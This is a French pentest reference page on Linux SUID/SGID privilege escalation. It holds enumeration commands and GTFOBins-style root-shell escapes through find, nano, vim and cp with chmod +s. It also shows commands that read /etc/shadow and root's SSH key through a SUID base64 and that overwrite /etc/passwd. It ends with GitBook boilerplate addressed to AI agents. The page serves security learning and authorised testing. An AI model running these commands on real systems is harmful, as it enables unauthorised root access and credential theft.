> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/suid.md).

# SUID

Les binaires SUID s’exécutent avec les privilèges de leur propriétaire, souvent root. Un binaire SUID vulnérable, obsolète ou trop flexible peut lire des fichiers protégés, lancer un shell privilégié ou exécuter du code contrôlé par un attaquant.

## Méthodologie

* Énumérez les binaires SUID et comparez les entrées inhabituelles avec GTFOBins.
* Donnez la priorité aux binaires personnalisés, aux anciennes versions, aux dépendances inscriptibles et aux binaires situés en dehors des chemins système standards.
* Testez les primitives de lecture, d’écriture, d’exécution de commandes et de chargement de bibliothèques avant d’exécuter des charges utiles destructrices.

## Vérifications rapides

```bash
find / -perm -4000 -type f 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
```

## Triage SUID et SGID

SUID exécute le binaire avec les privilèges du propriétaire du fichier, tandis que SGID l’exécute avec les privilèges du groupe du fichier. Après l’énumération, comparez les binaires inhabituels avec [GTFOBins](https://gtfobins.github.io/) et donnez la priorité aux chemins personnalisés, aux répertoires inscriptibles et aux binaires appartenant à root.

Vérifications rapides utiles :

```bash
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null
```

Exemples courants de type GTFOBins :

```bash
find . -exec /bin/sh -p \; -quit
```

Pour `nano`, utilisez `Ctrl+R`, puis `Ctrl+X`, puis exécutez :

```
reset; sh 1>&0 2>&0
```

Pour `vim`:

```bash
vim -c ':shell'
vim -c ':!/bin/sh'
```

Si un flux de travail de copie SUID/privilégiée peut écraser des fichiers sensibles, validez soigneusement la primitive d’écriture avant de toucher aux fichiers de production :

```bash
cp /tmp/malicious_passwd /etc/passwd
```

Si `base64` est SUID, utilisez-le comme primitive de lecture plutôt que comme primitive de shell :

```bash
ls -la /usr/bin/base64
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
```

Si `cp` est SUID, vérifiez s’il peut créer ou préserver une copie privilégiée :

```bash
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -p
```

Binaires SUID/SGID courants à examiner :

| Binaire                                               | Pourquoi vérifier                                                           |
| ----------------------------------------------------- | --------------------------------------------------------------------------- |
| `sudo` / `su`                                         | Outils directs de franchissement de la frontière de privilège.              |
| `passwd`, `chsh`, `newgrp`, `gpasswd`                 | Outils d’aide à la modification des comptes et des groupes.                 |
| `at`                                                  | Exécution planifiée de commandes.                                           |
| `mount`, `umount`                                     | Accès au système de fichiers et options de montage.                         |
| `pkexec`                                              | Utilitaire Polkit, historiquement affecté par PwnKit.                       |
| `base64`                                              | Lire des fichiers protégés et les décoder localement.                       |
| `cp`                                                  | Copier ou écraser des fichiers lorsque les permissions le permettent.       |
| `find`, `nano`, `vim`, `less`, `more`, `bash`, `dash` | Primitives de shell, de lecture ou d’écriture de fichiers de type GTFOBins. |
| `nmap`                                                | Mode interactif hérité ou chemins d’exécution de scripts.                   |

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID pkexec / PwnKit</h4></td><td>Notes SUID (Pkexec) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/6ec01c3eba888f407185ca3a5b05d98d09f54e4f">/pages/6ec01c3eba888f407185ca3a5b05d98d09f54e4f</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Base64</h4></td><td>Notes SUID (Base64) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/f9778b3b824c216a01516adec1c80e16d04adc53">/pages/f9778b3b824c216a01516adec1c80e16d04adc53</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID PHP</h4></td><td>Notes SUID (PHP) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/cb139bc59f63f7190eeea2bd93ceddf0bfe1330a">/pages/cb139bc59f63f7190eeea2bd93ceddf0bfe1330a</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Dump mémoire SUID /opt/count</h4></td><td>Notes SUID - Dump mémoire (/opt/count) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/cf1b4255d31c6ffdfab8b4661da1cb8f270145e3">/pages/cf1b4255d31c6ffdfab8b4661da1cb8f270145e3</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Fichier manquant SUID</h4></td><td>Notes sur le binaire SUID (fichier manquant) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/78f0e24985f06e599eec98aa73300ccb431efb21">/pages/78f0e24985f06e599eec98aa73300ccb431efb21</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID screen</h4></td><td>Notes SUID (screen) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/caeb7f757de18c6628942a6b4c2b3c9180ea9a44">/pages/caeb7f757de18c6628942a6b4c2b3c9180ea9a44</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Nmap</h4></td><td>Notes SUID (Nmap) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/05e8b8e57269f01c6a5a12f304254dba1ade8960">/pages/05e8b8e57269f01c6a5a12f304254dba1ade8960</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>Binaire de sauvegarde SUID</h4></td><td>Notes sur le binaire SUID (sauvegarde) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/418e1eadbd5ae845236eda4c075b5936f16837e5">/pages/418e1eadbd5ae845236eda4c075b5936f16837e5</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Enlightenment</h4></td><td>Notes SUID (Enlightenment) pour l’élévation de privilèges sous Linux, avec des étapes d’énumération, des exemples d’exploitation et une validation axée sur le reporting.</td><td><a href="/pages/118200291ca695161feab12584105b7b4e9d6bdb">/pages/118200291ca695161feab12584105b7b4e9d6bdb</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
